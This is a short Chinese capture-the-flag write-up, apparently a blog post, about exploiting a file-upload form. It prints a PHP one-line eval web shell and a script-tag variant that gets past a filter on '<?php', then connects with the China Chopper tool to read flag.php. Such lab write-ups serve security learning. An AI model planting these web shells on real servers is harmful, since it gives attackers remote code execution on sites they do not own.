打开连接 发现有个上传功能:

上传一句话试试:<?php @eval($_POST['pass']);?>
发现没有路径,看下源码:

找到路径,上菜刀提示连不上,猜测可能有过滤,或者文件不能被解析,先访问一下看看

发现<?php 被过滤了。。
翻阅资料找到一种php标记方法,将一句话改为:
<script language="phP">
@eval($_POST["pass"]);
</script>
上传再试菜刀连接:

连接成功:找到flag.php

bingo
本文分享了一次利用网站PHP上传功能的漏洞过程。通过尝试不同的PHP标记方法绕过过滤,成功上传木马并使用菜刀连接,最终找到了flag.php文件,实现了渗透目标。
492

被折叠的 条评论
为什么被折叠?



